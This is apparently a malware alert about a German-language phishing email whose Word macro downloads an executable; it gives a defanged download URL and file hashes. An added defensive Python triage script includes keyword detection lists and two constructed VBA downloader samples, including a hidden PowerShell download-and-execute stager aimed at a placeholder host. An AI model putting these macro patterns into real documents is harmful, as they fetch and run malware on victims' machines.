New Word malware: “Bestellung”


MX Lab, http://www.mxlab.eu, has started intercepting a new malware distribution campaign by email with the subject “Bestellung” (German for “order”).

The email is sent from the spoofed address “Krell, Jürgen” <jkrell@berges.de> and its body consists of nothing but a corporate signature block, which lends the spoofed sender credibility (translated from German below):

Best regards
BERGES Antriebstechnik/Purchasing
p.p. Jürgen Krell
Head of Purchasing

Tel: +49 2264 17-145
Fax: +49 2264 17-144
E-mail: jkrell@berges.de
--------------------------------
BERGES Antriebstechnik GmbH & Co. KG
Industriestr. 13, 51709 Marienheide
Tel.: +49 2264 17 0, Fax: +49 2264 17 125
E-mail: info_ban@berges.de
Internet: http://www.berges.de
--------------------------------
VAT ID No.: DE122 546 223
Commercial register: Cologne District Court HRA 16990
General partner: BERGES Antriebstechnik GmbH
Commercial register: Cologne District Court HRB 38484
Managing directors: Dipl.-Kfm. Dietmar Sarstedt, Karl-Heinz Georg
--------------------------------

BERGES_Email_Abbinder_ISO

The attached file 13042092.doc is a Word document containing a malicious macro; nothing happens until the recipient opens it and enables macros.

At the time of writing the document is detected as LooksLike.Macro.Malware.gen!d3 (v), Trojan:W97M/MaliciousMacro.GEN or Macro.Trojan-Downloader.Agent.KF by only 5 of the 52 AV engines on VirusTotal.

See VirusTotal or Malwr for more detailed information.
SHA256: b1a2901812c8680dce41c13e6c6b98997af0e4f9140064792cdefdee1b41e080

Once it runs, the macro downloads an executable from hxxp://simplyslim.com.sg/87tf6d45/90u7f65d.exe (URL defanged; do not open it from a production host).

At the time of writing the downloaded executable is detected as W32/Agent.XL.gen!Eldorado, HEUR/QVM10.1.Malware.Gen or UDS:DangerousObject.Multi.Generic by only 4 of the 54 AV engines on VirusTotal, so signature-based mail filtering alone should not be relied on to stop this campaign.

See VirusTotal or Malwr for more detailed information.
SHA256: 932f595f1ccce5b48218613348357f190a6efc0e4931d9b40bb4f4473ff9367c
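With AV coverage this low, responders usually triage the macro statically rather than wait for signatures. The script below is an added example written for this post, not code from MX Lab: it takes VBA source text (as extracted by a tool such as olevba), flags auto-execution procedures, groups suspicious keywords by capability, extracts and defangs any literal URLs, and checks file bytes against the two SHA256 indicators listed above. The three macro texts inside it are constructed stand-ins; the real macro in 13042092.doc is not shown on this page, and the host example.invalid is a placeholder.

```python
"""Static triage of VBA macro source text (added example, standard library only)."""
import hashlib
import re

# SHA256 indicators listed in the post (the .doc and the downloaded .exe).
KNOWN_SHA256 = {
    "b1a2901812c8680dce41c13e6c6b98997af0e4f9140064792cdefdee1b41e080",
    "932f595f1ccce5b48218613348357f190a6efc0e4931d9b40bb4f4473ff9367c",
}

# Procedures Word runs on its own once the user clicks "Enable Content".
AUTOEXEC_TRIGGERS = ("AutoOpen", "Document_Open", "AutoExec", "AutoClose", "Document_Close")

# Keywords typical of a macro downloader, grouped by the capability they indicate.
SUSPICIOUS_KEYWORDS = {
    "download": ("URLDownloadToFile", "MSXML2.XMLHTTP", "WinHttp.WinHttpRequest",
                 "ADODB.Stream", "Net.WebClient", "DownloadString", "DownloadFile"),
    "execute": ("Shell", "WScript.Shell", "CreateObject", "ShellExecute", "powershell"),
    "obfuscation": ("Chr", "ChrW", "StrReverse", "Xor"),
}

# Accepts live (http) and defanged (hxxp) URLs; stops at quotes and whitespace.
URL_RE = re.compile(r"\bh(?:xx|tt)ps?://[^\s\"'<>]+", re.IGNORECASE)


def _has_word(text, word):
    # Match the keyword as a whole token, so "Shell" does not hit "ShellExecute".
    pattern = r"(?<![A-Za-z0-9_])" + re.escape(word) + r"(?![A-Za-z0-9_])"
    return re.search(pattern, text, re.IGNORECASE) is not None


def is_known_sample(data):
    """True when the bytes hash to one of the published indicators."""
    return hashlib.sha256(data).hexdigest() in KNOWN_SHA256


def defang(url):
    """Make a URL safe to paste into a report: http -> hxxp, host dots bracketed."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    scheme = re.sub(r"^http", "hxxp", scheme, flags=re.IGNORECASE)
    return f"{scheme}://{host.replace('.', '[.]')}{slash}{path}"


def triage(vba):
    """Summarise what a macro can do from its source text alone."""
    triggers = [t for t in AUTOEXEC_TRIGGERS
                if re.search(r"\bSub\s+" + t + r"\s*\(", vba, re.IGNORECASE)]
    hits = {cat: [w for w in words if _has_word(vba, w)]
            for cat, words in SUSPICIOUS_KEYWORDS.items()}
    hits = {cat: ws for cat, ws in hits.items() if ws}
    urls = [defang(u) for u in URL_RE.findall(vba)]
    # Auto-execution plus the ability to fetch and run something is the
    # downloader pattern from the post, whether or not a URL is visible.
    downloader = bool(triggers) and "download" in hits and "execute" in hits
    return {"autoexec": triggers, "capabilities": hits, "urls": urls,
            "likely_downloader": downloader}


# Constructed sample 1: literal URL, MSXML2 download, ADODB write, Shell execute.
SAMPLE_PLAIN = r'''
Sub AutoOpen()
    Dim req As Object, strm As Object, dst As String
    dst = Environ("TEMP") & "\update.exe"
    Set req = CreateObject("MSXML2.XMLHTTP")
    req.Open "GET", "http://example.invalid/files/update.exe", False
    req.send
    Set strm = CreateObject("ADODB.Stream")
    strm.Open: strm.Type = 1
    strm.Write req.responseBody
    strm.SaveToFile dst, 2
    Shell dst, vbHide
End Sub
'''

# Constructed sample 2: reversed URL and PowerShell stager, so no URL is visible.
SAMPLE_OBFUSCATED = r'''
Private Sub Document_Open()
    Dim h As String, c As String
    h = StrReverse("dilavni.elpmaxe//:ptth")
    c = "powershell -w hidden -c " & Chr(34) & "IEX (New-Object Net.WebClient).DownloadString('" & h & "/a')" & Chr(34)
    CreateObject("WScript.Shell").Run c, 0
End Sub
'''

# Constructed sample 3: a harmless formatting macro, to show the heuristic stays quiet.
SAMPLE_BENIGN = r'''
Sub FormatTable()
    Selection.Tables(1).Style = "Grid Table 4"
End Sub
'''

if __name__ == "__main__":
    for name, src in (("plain", SAMPLE_PLAIN), ("obfuscated", SAMPLE_OBFUSCATED),
                      ("benign", SAMPLE_BENIGN)):
        print(name, triage(src))
```

The second sample is the case that matters: string reversal hides the URL from extraction, but the auto-open trigger together with download and execute capability still marks it as a downloader, so a verdict should never depend on a URL being found in clear text.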
